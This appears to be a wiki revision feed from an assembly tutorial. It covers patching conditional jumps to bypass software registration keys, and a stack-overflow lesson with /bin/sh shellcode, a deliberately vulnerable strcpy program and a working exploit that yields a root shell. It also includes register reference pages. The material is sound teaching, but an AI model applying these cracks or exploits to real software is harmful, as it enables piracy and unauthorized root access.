== Common Protections ==<br />
<br />
The most common protection, and the one discussed here, is when a program requires a registration key to unlock. Usually, the key is based either on a random registration code provided by the program, or based on the username you enter. <br />
<br />
I'll list some definitions here. Note that these definitions are mine, and won't necessarily correspond to definitions others use. These are simply to make it easier to understand this and proceeding sections:<br />
* A '''''registration code''''' is a code generated by a program, that the registration key is derived from or checked against.<br />
* A '''''registration username''''' or just username is a username that a user enters. The registration key is based on that username. <br />
* A '''''registration key''''' is the key used to unlock a program. It may be based on a registration code, on a registration username, or based on nothing at all. <br />
<br />
<br />
== Finding the Spot ==<br />
<br />
The very first example goes over Starcraft's CDKey verification algorithm, but I provided the algorithm. Starcraft's is the simplest kind of verification, the key verifies itself without a username or code. The question is, how do you find the algorithm?<br />
<br />
Well, the unfortunate answer is, it varies, and it generally isn't easy. <br />
<br />
The first step is obviously to disassemble the program. After that, as a cracker, you have to try and find a weak point in the program. Here are several techniques:<br />
* Search for the text prompting for the key<br />
* Search for the registration code in memory, and find out where it's accessed<br />
* Enter a code, have it fail, then search memory for that failed code<br />
* Search for anything unique about the registration (colors, text, dialogs, etc).<br />
* Search for the registry key that stores the key<br />
* Search for a file that stores registration information<br />
* Search for the error message when a bad key is given<br />
<br />
The last technique is the most useful one, I've found. However, trying them all, and trying anything else that seems to suite the game works best. In the example in the next section, I found that searching for the text informing the user that the software is unregistered worked well for the game, as you'll see later. I may do a second example where I searched for the file that stored the key, and where it was created. <br />
<br />
To find Starcraft's CDKey verifier, I started with the network traffic, at the Winsock function (send() and recv()). From there, I backtracked to find where the packet is sent that validates the Starcraft key with Battle.net. It was a lot of work, but at the time I was learning about Starcraft's network activity so it was mostly a side-effect of what I was already doing. If I continue writing these tutorials, I might eventually get into that much detail, but I have no plans to yet. <br />
<br />
== Cracking the Game ==<br />
Once the right spot is found, cracking a game is often very easy. Typically, a program will have the following code:<br />
<pre><br />
if(keyIsValid)<br />
unlock()<br />
else<br />
displayError()<br />
</pre><br />
<br />
The assembly for that would look like:<br />
85 xx test keyIsValid, keyIsValid<br />
74 06 jz error<br />
e8 xx xx xx xx call unlock<br />
eb 06 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
As discussed in the section on machine code, the bytes to the left may be the machine code bytes (I did them quickly from a reference sheet, so they may or may not be exactly correct. This program can be modified by changing a couple bytes, which can either force the code to jump always or jump never.<br />
<br />
To force the code to jump (which, in this case, will make the key always valid), the jz is replaced with a jmp (by changing 74 to eb):<br />
85 xx test keyIsValid, keyIsValid<br />
eb 06 jmp error<br />
e8 xx xx xx xx call unlock<br />
eb 06 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
To prevent the code from jumping (which, in this case, will make the key always valid), the jz is replaced with a pair of nop instructions:<br />
85 xx test keyIsValid, keyIsValid<br />
90 nop<br />
90 nop<br />
e8 xx xx xx xx call unlock<br />
eb 06 jmp done<br />
error:<br />
e8 xx xx xx xx call displayError<br />
done:<br />
<br />
Make the appropriate change, run the game, and type in any code. The expected result should occur! <br />
<br />
The next example will show this on an actual game (on a game that I won't name here, for obvious reasons). <br />
<br />
== Writing a Keygen ==<br />
Even better than cracking a game is writing a keygen for it. The user enters their username or registration code, and the keygen outputs a valid key. <br />
<br />
Generally, this requires that the algorithm be fully reverse engineered and understood. Then a copy of it is made in C (or whatever language) which produces the same results. Note that the first three examples in this tutorial do just that: turning the assembly code back into C. So anybody who actually followed them should be in a good position to write a keygen, which will come in a later tutorial. <br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Example_4&diff=3161Example 42012-01-16T22:54:03Z<p>Killboy: /* Reminder: the Stack */</p>
<hr />
<div>{{Infobox assembly}}<br />
[[Category: Assembly Examples]]<br />
<br />
This is the first practical example here, and I thought it appropriate to use something that not only illustrates the concept of machine code, but also involves something I'm very interested in: security. <br />
<br />
This example will demonstrate a stack overflow vulnerability. <br />
<br />
This example will be done on Linux, with gcc. Windows does funny things to the stack that I don't really want to explain, and exploiting a vulnerability on Windows is trickier. <br />
<br />
For more information on stack overflows, have a look at the paper [http://insecure.org/stf/smashstack.html Smashing the Stack for Fun and Profit] by Aleph One. <br />
<br />
== Local Exploits ==<br />
If you haven't done any real research on vulnerabilities and exploits, that's fine. This section will briefly cover what you need to know. <br />
<br />
Some programs on Linux run with root, or superuser privilege. Programs that, for example, need access to the password file require root access, since the password file is unreadable by a usual user. If a user can take control of these programs, and have the program run a shell. The shell will run as the same user as the program, which is root. From there, the attacker can run whichever program he chooses with root access, which means he has full control of the system. <br />
<br />
So the steps are:<br />
* Find a SetUID program (ie, a program that runs as root)<br />
* Find a vulnerability in the program<br />
* Exploit it<br />
<br />
The way to exploit the vulnerability is to trick the program into running arbitrary machine code, supplied by the attacker. The machine code, of course, represents assembly instructions. This machine code is called "shellcode", because it traditionally spawns a shell for the attacker. <br />
<br />
== Shellcode ==<br />
Here is some standard shellcode, with annotations. I won't explain what this does, because you should know how every line works, by now. The only tricky part is the Linux system call, which is explained in the comments:<br />
<pre><br />
;;;;;;;;<br />
; Name: shellcode.asm<br />
; Author: Jon Erickson<br />
; Date: March 24, 2005<br />
; To compile: nasm shellcode.asm<br />
; Requires: nasm <http://nasm.sourceforge.net><br />
;<br />
; Purpose: This is similar to shellcode.asm except that it<br />
; uses more condensed code and some tricks like xor'ing a<br />
; variable with itself to eliminate null (00) bytes, which<br />
; allows it to be stored in an ordinary string.<br />
;;;;;;;;<br />
BITS 32<br />
<br />
; setreuid(uid_t ruit, uid_t euid<br />
xor eax, eax ; First eax must be 0 for the next instruction<br />
mov al, 70 ; Put 70 into eax, since setreuid is syscall #70<br />
xor ebx, ebx ; Put 0 into ebx, to set the real uid to root<br />
xor ecx, ecx ; Put 0 into ecx, to set the effective uid to root<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
jmp short two ; jump down to the bottom to get the address of "/bin/sh"<br />
one:<br />
pop ebx ; pop the "return address" from the stack<br />
; to put the address of the string into ebx<br />
; execve(const char *filename, char *const argv [], char *const envp[])<br />
xor eax, eax ; Clear eax<br />
mov [ebx+7], al ; Put the 0 from eax after the "/bin/sh"<br />
mov [ebx+8], ebx ; Put the address of the string from ebx here<br />
mov [ebx+12], eax ; Put null here<br />
<br />
mov al, 11 ; execve is syscall #11<br />
lea ecx, [ebx+8] ; Load the address that points to /bin/sh<br />
lea edx, [ebx+12] ; Load the address where we put null<br />
int 0x80 ; Call the kernel to make the system call happen<br />
<br />
two:<br />
call one ; Use a call to get back to the top to get this; address<br />
db '/bin/sh'<br />
</pre><br />
This code can be assembled with nasm, to produce the following machine code:<br />
<pre><br />
ron@slayer:~$ nasm shellcode.asm<br />
ron@slayer:~$ hexdump -C shellcode<br />
00000000 31 c0 b0 46 31 db 31 c9 cd 80 eb 16 5b 31 c0 88 |1À°F1Û1ÉÍ.ë.[1À.|<br />
00000010 43 07 89 5b 08 89 43 0c b0 0b 8d 4b 08 8d 53 0c |C..[..C.°..K..S.|<br />
00000020 cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f 73 68 |Í.èåÿÿÿ/bin/sh|<br />
</pre><br />
<br />
Note that there isn't a single '00' byte. This is intentional, because shellcode is often stored in a string, and '00', or '\0', terminates strings. <br />
<br />
When this machine code runs, it attempts to spawn /bin/sh as root. This shellcode can be changed to any assembly (provided there are no 00 bytes). A common modification is changing the exploit to open a network port and listen for connections, or to connect back to the attacker. That behaviour is, obviously, used in network-based attacks. <br />
<br />
== Reminder: the Stack ==<br />
<br />
If you don't remember how the stack works, go back and re-read the section on the stack. <br />
<br />
Remember that the stack for a function looks like this, from bottom to top:<br />
* ... used by calling function ...<br />
* parameters<br />
* return address<br />
* local variables<br />
* saved registers<br />
* ...unallocated...<br />
<br />
Remember also that arrays are simply a sequence of bytes stored somewhere. In the case of local variables, the array is stored on the stack. <br />
<br />
Because an array operation is simply a memory access converted to assembly, a program doesn't actually know how long the array is. All it knows is what the programmer told it to do. If the programmer says it's ok to copy 100 bytes into an array, then the array is, presumably, at least 100 bytes long. <br />
<br />
Sometimes, a program forgets to check how much data the program can copy, which allows an attacker to provide too much data. The program, not knowing any better, copies the data past the end of the array, over other local variables. If it goes far enough, the return address may be overwritten. If the attacker can control the return address, then the return address can be pointed at the shellcode. Then when the "ret" instruction is issued, and ret pops off the return address to jump to, it instead gets the address of the shellcode! <br />
<br />
In other words, the return address is overwritten with the address of the shellcode, so when the function returns the shellcode runs.<br />
<br />
== The Vulnerable Program ==<br />
Here is a vulnerable program I wrote several years ago, for a paper (except that I fixed a couple spelling mistakes and changed the array size). It's extremely simple, and is only meant as a demonstration:<br />
<pre><br />
/**<br />
* Name: StackVuln.c<br />
* Author: Ron Bowes<br />
* Date: March 24, 2004<br />
* To compile: gcc StackVuln.c -o StackVuln<br />
* Requires: n/a<br />
*<br />
* Purpose: This code is vulnerable to a stack overflow if more than<br />
* 20 characters are entered. The exploit for it was written by<br />
* Jon Erickson in Hacking: Art of exploitation, but I wrote<br />
* this vulnerable code independently.<br />
*/<br />
#include <stdio.h><br />
#include <string.h><br />
int main(int argc, char *argv[])<br />
{<br />
char string[40];<br />
strcpy(string, argv[1]);<br />
printf("The message was: %s\n", string);<br />
printf("Program completed normally!\n\n");<br />
return 0;<br />
}<br />
</pre><br />
<br />
== Some Testing ==<br />
First, the program is compiled and tested with normal data:<br />
<pre><br />
ron@slayer:~$ gcc StackVuln.c -o StackVuln<br />
ron@slayer:~$ ./StackVuln "This is a test"<br />
The message was: This is a test<br />
Program completed normally!<br />
</pre><br />
<br />
Now we'll try it with progressively longer strings, in the ''gdb'' debugger, starting at 40 characters, then 50, 60. At 60, an "illegal instruction" occurs, which means we're close. Adding 4 more causes the crash we want:<br />
<pre><br />
ron@slayer:~$ gdb StackVuln<br />
(gdb) run 1234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890<br />
The message was: 1234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 12345678901234567890123456789012345678901234567890<br />
Starting program: /home/ron/StackVuln 12345678901234567890123456789012345678901234567890<br />
The message was: 12345678901234567890123456789012345678901234567890<br />
Program completed normally!<br />
Program exited normally.<br />
<br />
(gdb) run 123456789012345678901234567890123456789012345678900123456789<br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789<br />
The message was: 123456789012345678901234567890123456789012345678900123456789<br />
Program completed normally!<br />
<br />
Program received signal SIGILL, Illegal instruction.<br />
0xb7ed3f00 in __libc_start_main () from /lib/tls/libc.so.6<br />
<br />
(gdb) run 1234567890123456789012345678901234567890123456789001234567890123<br />
Starting program: /home/ron/StackVuln 1234567890123456789012345678901234567890123456789001234567890123<br />
The message was: 1234567890123456789012345678901234567890123456789001234567890123<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x33323130 in ?? ()<br />
</pre><br />
Note the address that it crashed at: 0x38373635. Remembering ascii, we know that 0x33 is '3', 0x32 is '2', 0x31 is '1', and 0x30 is '0'. That means that the return address was overwritten by the 0123. This theory can be tested by changing those characters to AAAA ('A' is 0x41, so the return address will likely be 0x41414141):<br />
<pre><br />
Starting program: /home/ron/StackVuln 123456789012345678901234567890123456789012345678900123456789AAAA<br />
The message was: 123456789012345678901234567890123456789012345678900123456789AAAA<br />
Program completed normally!<br />
<br />
Program received signal SIGSEGV, Segmentation fault.<br />
0x41414141 in ?? ()<br />
</pre><br />
The expected result is confirmed! <br />
<br />
== The Exploit ==<br />
<br />
To make this work well, I removed the display line from the program. Printing the shellcode to the terminal made things ugly. <br />
<br />
While I used my old code for the vulnerable program, I re-wrote the exploit from scratch to make it simpler, so that it doesn't require a nop-slide (See below). Here is the program that exploits the vulnerable program above, with comments:<br />
<pre><br />
/**<br />
* Name: Stackexploit.c<br />
* Author: Ronald Bowes<br />
* Date: March 13, 2007<br />
* To compile: gcc Stackexploit.c -o Stackexploit<br />
* Requires: The vulnerable program, called "StackVuln"<br />
*<br />
* Purpose: This code, originally from Hacking: Art of exploitation,<br />
* exploits a program with a stack overflow in a 40 character buffer<br />
* by writing 64 characters to it.<br />
*/<br />
#include <stdlib.h><br />
#include <string.h><br />
#include <unistd.h><br />
<br />
int main(int argc, char *argv[])<br />
{<br />
/* This string simulates the string in the vulnerable application. As long<br />
* as this program is called with the same commandline arguments, this string<br />
* will be in the same position in memory, which lets us set the return addres<br />
* in the target program. */<br />
char string[40];<br />
<br />
/* Here is the shellcode. The XXXX at the end will be overwritten by the address<br />
* of "string" */<br />
char exploit[] =<br />
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* 1 - 10 */<br />
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b" /* 11 - 20 */<br />
"\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" /* 21 - 30 */<br />
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f" /* 31 - 40 */<br />
"\x62\x69\x6e\x2f\x73\x68\x90\x90\x90\x90" /* 41 - 50 */<br />
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" /* 51 - 60 */<br />
"XXXX"; /* 61 - 64 */<br />
<br />
/* These two lines cause the program to execute itself the same way<br />
* the vulnerable program will be executed. This ensures that the stack<br />
* is set up identicly, so the "string" declared here will have the same<br />
* address as the "string" in the vulnerable program. */<br />
if(argc < 2)<br />
execl(argv[0], "StackVuln", exploit, 0);<br />
<br />
/* Overwrite the XXXX with the address that's being jumped to. This is the address<br />
* of our simulated variable. */<br />
*((int*)(exploit + 60)) = &string;<br />
<br />
/* Finally, ow call the program with our exploit as the argument */<br />
execl("./StackVuln", "StackVuln", exploit, 0);<br />
<br />
return 0;<br />
}<br />
</pre><br />
<br />
Here, the vulnerable program is set to be SetUID (ie, run as root), and is run with the exploit program:<br />
<pre><br />
ron@slayer:~$ sudo chown root.root StackVuln<br />
ron@slayer:~$ sudo chmod +s StackVuln<br />
ron@slayer:~$ ls -l StackExploit StackVuln<br />
-rwxr-xr-x 1 ron users 11180 2007-03-14 13:46 StackExploit*<br />
-rwsr-sr-x 1 root root 11132 2007-03-14 13:36 StackVuln*<br />
ron@slayer:~$ ./StackExploit<br />
Program completed normally!<br />
<br />
sh-2.05b# whoami<br />
root<br />
</pre><br />
<br />
== nop Slide ==<br />
This section isn't necessary to assembly, but if you're curious about this exploit and ones like it, this is for you. <br />
<br />
In most cases, the attacker doesn't have the benefit of being able to simulate the stack of the original program, which makes it impossible to know where to jump. In those cases, the jump is often a guess, which may or may not be right. <br />
<br />
To avoid the requirement for pin-point accuracy, as many nop instructions as possible are commonly put in front of the shellcode. These nops, known as a nop-slide, give the attacker a bigger target to return to. Instead of having to return to a specific address, the return address need only be one of the nop instructions. If any nop instruction is hit, it runs, doing nothing, the next one runs, also doing nothing, and so on. Eventually, after the nops have all run, the shellcode is run as before. <br />
<br />
nop sleds are very common in exploits, unless the return address is in a predictable location.<br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3160Registers2012-01-16T03:25:44Z<p>Killboy: /* Special Purpose Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture.<br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack (the top is actually at a lower virtual address than the bottom as the stack grows downwards in memory towards the heap). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
For special purpose and floating point registers not listed here, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores a pointer to the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3159Registers2012-01-16T03:25:04Z<p>Killboy: /* General Purpose Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture.<br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack (the top is actually at a lower virtual address than the bottom as the stack grows downwards in memory towards the heap). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores a pointer to the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
